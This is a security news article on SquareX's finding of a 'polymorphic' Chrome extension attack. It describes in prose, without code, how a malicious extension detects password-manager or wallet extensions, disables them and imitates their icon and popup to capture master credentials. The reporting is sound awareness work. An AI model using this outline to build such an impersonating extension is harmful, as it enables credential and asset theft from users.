New Polymorphic Attack That Mimic Any Chrome Extension Installed On The Browser

SquareX’s research team has recently uncovered a sophisticated browser attack technique that allows malicious extensions to impersonate any extension installed on a victim’s browser.

This newly discovered “polymorphic extension attack” creates pixel-perfect replicas of legitimate extensions’ icons, HTML popups, and workflows, making it nearly impossible for users to distinguish them from authentic extensions.

The attack even temporarily disables the legitimate extension, creating a seamless deception that tricks users into providing sensitive credentials to what they believe is their trusted tool.

The attack exploits the human tendency to rely on visual cues for verification, particularly the extension icons on the pinned tab bar. When users interact with these icons, they assume they’re engaging with legitimate extensions.

However, the polymorphic extension can silently replace these visual indicators at precisely timed moments, creating a perfect illusion that leads to credential theft.

What makes this attack particularly dangerous is that it targets high-value extensions such as password managers, cryptocurrency wallets, banking applications, and productivity tools.

Once compromised, attackers gain access to sensitive information and financial assets stored within these services.

For example, if a password manager is compromised, attackers obtain access to the victim’s entire credential vault, enabling them to access any associated service or account.

While the analysts at SquareX detected that the technical implementation involves multiple phases that demonstrate sophisticated evasion techniques.

Initially, attackers publish their malicious extension disguised as a useful tool, such as an AI marketing assistant.

After installation, the extension functions as promised to avoid raising suspicion while monitoring for high-value target extensions on the user’s browser.

To identify target extensions, the attacker employs techniques like the chrome.management API or more stealthily, web resource hitting.

This latter approach injects scripts into webpages to detect specific installed extensions by checking for unique web resources associated with them, such as logo PNG files.

Technical Implementation

The core of this attack lies in its ability to dynamically transform its appearance and behavior.

When a target is identified, such as when a user visits a login page, the polymorphic extension temporarily disables the legitimate extension using Chrome’s API capabilities, then visually transforms its icon and interface to match the target.

When users click on what appears to be their password manager, they’re actually interacting with the malicious extension, which captures their master credentials and secret keys before seamlessly returning control to the legitimate extension.

This attack is particularly concerning as it exploits legitimate Chrome functionality and uses permissions classified as medium risk, making it difficult to detect through standard security measures.

The APIs used – activeTab, scripting, and chrome.management – are commonly used by legitimate extensions, allowing the malicious code to blend in with normal browser operations.

Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.